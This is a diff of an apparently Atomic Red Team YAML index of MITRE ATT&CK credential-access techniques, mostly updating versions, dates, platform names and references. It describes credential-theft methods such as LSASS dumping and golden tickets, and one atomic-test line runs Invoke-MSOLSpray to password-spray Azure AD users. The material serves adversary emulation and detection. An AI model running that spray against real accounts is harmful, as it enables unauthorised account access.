-      spec_version: '2.1'
     atomic_tests: []
   T1552.004:
     technique:
-      modified: '2023-04-12T23:52:08.194Z'
+      modified: '2024-10-04T11:31:56.622Z'
       name: 'Unsecured Credentials: Private Keys'
       description: "Adversaries may search for private key certificate files on compromised
         systems for insecurely stored credentials. Private cryptographic keys and
@@ -46456,7 +47222,7 @@ credential-access:
         as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:&#92;Users&#92;(username)&#92;.ssh&#92;</code>
         on Windows. Adversary tools may also search compromised systems for file extensions
         relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
-        Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+        Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
         device key and a transport key are generated and used to verify the device’s
         identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
         to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -46490,7 +47256,7 @@ credential-access:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
@@ -46518,7 +47284,7 @@ credential-access:
       - source_name: Kaspersky Careto
         description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
           Masked APT. Retrieved July 5, 2017.
-        url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+        url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
       - source_name: Microsoft Primary Refresh Token
         description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
           Retrieved February 21, 2023.
@@ -46529,14 +47295,13 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Public-key_cryptography
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.004
     atomic_tests: []
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -46644,12 +47409,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests: []
   T1003.001:
     technique:
-      modified: '2023-12-27T17:57:20.003Z'
+      modified: '2024-08-13T13:52:45.379Z'
       name: 'OS Credential Dumping: LSASS Memory'
       description: |
         Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -46686,6 +47450,7 @@ credential-access:
       - Edward Millington
       - Ed Williams, Trustwave, SpiderLabs
       - Olaf Hartong, Falcon Force
+      - Michael Forret, Quorum Cyber
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -46698,7 +47463,7 @@ credential-access:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -46748,12 +47513,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.001
     atomic_tests: []
   T1110.003:
     technique:
-      modified: '2024-03-07T14:33:34.201Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Spraying'
       description: |-
         Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -46779,6 +47543,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - John Strand
@@ -46794,18 +47559,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -46832,9 +47597,6 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.003
     atomic_tests:
     - name: Password spray all Azure AD users with a single password
@@ -46935,7 +47697,7 @@ credential-access:
           Invoke-MSOLSpray -UserList "#{user_list}" -Password "#{password}"
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -46946,13 +47708,13 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -46966,6 +47728,7 @@ credential-access:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -46976,12 +47739,12 @@ credential-access:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1003.005:
     technique:
-      modified: '2024-04-18T23:47:54.553Z'
+      modified: '2024-10-15T14:18:59.123Z'
       name: 'OS Credential Dumping: Cached Domain Credentials'
       description: "Adversaries may attempt to access cached domain credentials used
         to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -47056,7 +47819,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.005
     atomic_tests: []
   T1558.001:
@@ -47102,7 +47864,7 @@ credential-access:
         url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
         description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
           Retrieved February 27, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-05T16:07:03.779Z'
       name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
       description: "Adversaries who have the KRBTGT account password hash may forge
         Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
@@ -47137,16 +47899,14 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.001
     atomic_tests: []
   T1649:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal or Forge Authentication Certificates
       description: |-
-        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
 
         Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
 
@@ -47156,21 +47916,23 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Tristan Bennett, Seamless Intelligence
+      - Lee Christensen, SpecterOps
+      - Thirumalai Natarajan, Mandiant
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
-      - Azure AD
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Tristan Bennett, Seamless Intelligence
-      - Lee Christensen, SpecterOps
-      - Thirumalai Natarajan, Mandiant
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -47219,33 +47981,11 @@ credential-access:
         url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1649
     atomic_tests: []
   T1552.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
-      type: attack-pattern
-      created: '2020-02-04T13:02:11.685Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.003
-        url: https://attack.mitre.org/techniques/T1552/003
-      - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        source_name: External to DA, the OS X Way
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:24:04.912Z'
       name: 'Unsecured Credentials: Bash History'
       description: 'Adversaries may search the bash command history on compromised
         systems for insecurely stored credentials. Bash keeps track of the commands
@@ -47260,25 +48000,43 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Monitoring when the user's <code>.bash_history</code> is
         read can help alert to suspicious activity. While users do typically rely
         on their history of commands, they often access this history through other
         utilities like "history" instead of commands like <code>cat ~/.bash_history</code>.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+      created: '2020-02-04T13:02:11.685Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/003
+        external_id: T1552.003
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.003
     atomic_tests: []
   T1552.001:
     technique:
-      modified: '2024-04-15T21:33:00.213Z'
+      modified: '2024-10-15T14:28:43.639Z'
       name: 'Unsecured Credentials: Credentials In Files'
       description: |-
         Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
@@ -47352,7 +48110,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.001
     atomic_tests: []
   T1606.001:
@@ -47414,11 +48171,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1528:
     technique:
-      modified: '2024-03-24T19:41:54.832Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Application Access Token
       description: "Adversaries can steal application access tokens as a means of
         acquiring credentials to access remote systems and resources.\n\nApplication
@@ -47467,6 +48223,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Shailesh Tiwary (Indian Army)
@@ -47475,6 +48232,7 @@ credential-access:
       - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
       - Ram Pliskin, Microsoft Azure Security Center
       - Jack Burns, HubSpot
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -47485,13 +48243,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
-      - Office 365
-      - Azure AD
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.3'
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -47547,44 +48306,11 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1528
     atomic_tests: []
   T1552.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
-      type: attack-pattern
-      created: '2020-02-11T18:43:06.253Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.006
-        url: https://attack.mitre.org/techniques/T1552/006
-      - source_name: Microsoft GPP 2016
-        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
-        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
-          March 9, 2020.
-      - url: https://msdn.microsoft.com/library/cc422924.aspx
-        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
-          11, 2018.
-        source_name: Microsoft GPP Key
-      - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
-        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
-          Retrieved April 11, 2018.
-        source_name: Obscuresecurity Get-GPPPassword
-      - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
-          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
-        url: https://adsecurity.org/?p=2288
-        source_name: ADSecurity Finding Passwords in SYSVOL
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-08-15T13:21:22.734Z'
       name: 'Unsecured Credentials: Group Policy Preferences'
       description: |
         Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
@@ -47601,25 +48327,54 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
         for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
         and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
         in SYSVOL)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+      created: '2020-02-11T18:43:06.253Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/006
+        external_id: T1552.006
+      - source_name: Obscuresecurity Get-GPPPassword
+        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+          Retrieved April 11, 2018.
+        url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+      - source_name: Microsoft GPP 2016
+        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+          March 9, 2020.
+        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+      - source_name: Microsoft GPP Key
+        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+          11, 2018.
+        url: https://msdn.microsoft.com/library/cc422924.aspx
+      - source_name: ADSecurity Finding Passwords in SYSVOL
+        description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+        url: https://adsecurity.org/?p=2288
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.006
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -47694,11 +48449,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1606:
     technique:
-      modified: '2023-10-15T11:10:03.428Z'
+      modified: '2024-10-15T15:58:23.638Z'
       name: Forge Web Credentials
       description: "Adversaries may forge credential materials that can be used to
         gain access to web applications or Internet services. Web applications and
@@ -47742,11 +48496,10 @@ credential-access:
       - Windows
       - macOS
       - Linux
-      - Azure AD
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -47770,8 +48523,8 @@ credential-access:
         url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
       - source_name: GitHub AWS-ADFS-Credential-Generator
         description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
-          Retrieved December 16, 2020.
-        url: https://github.com/damianh/aws-adfs-credential-generator
+          Retrieved September 27, 2024.
+        url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
@@ -47787,11 +48540,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1621:
     technique:
-      modified: '2024-04-19T04:26:29.365Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication Request Generation
       description: |-
         Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -47802,11 +48554,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
       - Pawel Partyka, Microsoft 365 Defender
       - Shanief Webb
       - Obsidian Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
         logs for suspicious events: unusual login attempt source location, mismatch
@@ -47816,16 +48570,16 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
       - IaaS
       - SaaS
-      - Azure AD
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -47863,13 +48617,10 @@ credential-access:
         url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.008:
     technique:
-      modified: '2023-04-11T00:34:00.779Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Chat Messages
       description: |-
         Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -47878,6 +48629,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Douglas Weir
       x_mitre_deprecated: false
@@ -47885,11 +48637,11 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -47907,13 +48659,10 @@ credential-access:
         url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1212:
     technique:
-      modified: '2023-10-15T11:45:21.555Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Exploitation for Credential Access
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. 
@@ -47926,6 +48675,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
       - Mohit Rathore
@@ -47939,12 +48689,13 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      - Azure AD
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Process: Process Creation'
@@ -47976,17 +48727,14 @@ credential-access:
         url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
       - source_name: Microsoft Midnight Blizzard Replay Attack
         description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
-          Retrieved September 27, 2023.
-        url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+          Retrieved September 12, 2024.
+        url: https://x.com/MsftSecIntel/status/1671579359994343425
       - source_name: Technet MS14-068
         description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
           Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
         url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -48059,12 +48807,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
